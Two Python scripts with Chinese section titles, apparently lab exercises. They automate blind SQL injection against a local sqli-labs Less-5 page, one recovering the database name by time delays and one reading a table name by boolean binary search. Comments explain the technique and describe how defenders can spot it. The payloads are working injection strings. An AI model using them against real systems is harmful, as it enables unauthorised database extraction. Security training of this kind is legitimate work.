自增脚本
# coding:utf-8
import requests
import datetime
import time
# 获取数据库名长度
def database_len():
# Linear probe for the length of the current database name via time-based
# blind SQL injection against the local sqli-labs Less-5 page.
# Each request asks MySQL to sleep(1) only when length(database()) > i, so
# the answer is read from response latency; the page body is never used.
# Defender's view: the log signature is a query-string `id` value containing a
# closing quote, if()/sleep() and a trailing "--+" comment, plus a burst of
# near-identical requests to one URL whose latencies split into ~0 s and
# >=1 s. The weakness exercised is the `id` value being concatenated into the
# SQL text; a parameterized query removes this injection point.
for i in range(1, 10):
url = "http://127.0.0.1/sqli-labs/Less-5/index.php"
payload = " ?id=1' and if(length(database())>%s,sleep(1),0) --+" % i
# print(url+payload+'%23')
# Wall-clock timing brackets only the HTTP round trip; `r` is never read.
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
# timedelta.seconds is the integer seconds field, so sub-second latency
# reads as 0 here.
sec = (time2 - time1).seconds
# A delayed reply means the condition held; keep counting. The first
# undelayed reply stops the loop, leaving i as the length (for names of
# up to nine characters). Both branches print i; only the else branch breaks.
if sec >= 1:
print(i)
else:
print(i)
break
print('database_len:', i)
#获取数据库名
def database_name():
# Recover the database name one character at a time, again purely by timing:
# for each position j (1..8) every candidate character is tried in order, and
# the server sleeps for 3 s only when substr(database(),j,1) matches.
# Defender's view: the result is dozens of requests per position to the same
# URL, differing only in one character of the `id` payload, with exactly one
# slow reply per position — an easy pattern to spot in access logs or in
# per-client latency distributions.
name = ''
for j in range(1,9):
# Candidate alphabet; every miss still costs a full request.
for i in 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.':
#0123456789abcdefghijklmnopqrstuvwxyz
url = "http://127.0.0.1/sqli-labs/Less-5/index.php"
payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),0) --+" % (j,i)
#print(url+payload)
time1 = datetime.datetime.now()
# The response body is not inspected; only the elapsed time matters.
r = requests.get(url + payload)
time2 = datetime.datetime.now()
# Integer seconds only (timedelta.seconds).
sec = (time2 - time1).seconds
# A reply delayed by >= 3 s identifies the character: record it and move to
# the next position. A position where nothing matches is silently skipped,
# so the printed name can be shorter than the real one.
if sec >=3:
name += i
print(name)
break
print('database_name:', name)
if __name__ == '__main__':
# Only the name probe runs as a script; database_len() is defined but never called.
database_name()
二分法脚本
# -*- coding: utf-8 -*-
import requests
url="http://127.0.0.1/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{b},1))<{a}--+ "
# Boolean-based blind injection: here the page text, not its timing, is the
# oracle. The injected condition compares the ASCII code of character {b} of
# the first table name in the current schema (read via information_schema)
# against a bound {a}; the loop below narrows that bound by binary search.
# Defender's view: the payload carries information_schema, substr() and
# ascii() in the `id` query parameter and the server answers each request
# normally, so detection relies on request logging rather than latency.
tablename=''
# Position b of the table name, 1..9; longer names are not fully read.
for b in range(1,10):
# Search bounds on the ASCII code; note `min`/`max` shadow the builtins here.
min=0
max=127
while (max-min)>1:
mid=(min+max)//2#(integer division)
payload = url.format(a=mid, b=b)
print (payload)
# One full GET per bisection step, roughly seven per position.
r=requests.get(payload,timeout=10)
print (r.text)
# The substring 'are' in the body is taken to mean "condition true"
# (ascii < mid); presumably a fixed success string of the Less-5 page —
# verify against the application.
if 'are' in r.text:
max=mid
else:
min=mid
# On exit max-min == 1, so min is the code that failed "< mid" and is
# appended as the recovered character.
tablename+=chr(min)
print(min)
print(tablename)
print (tablename)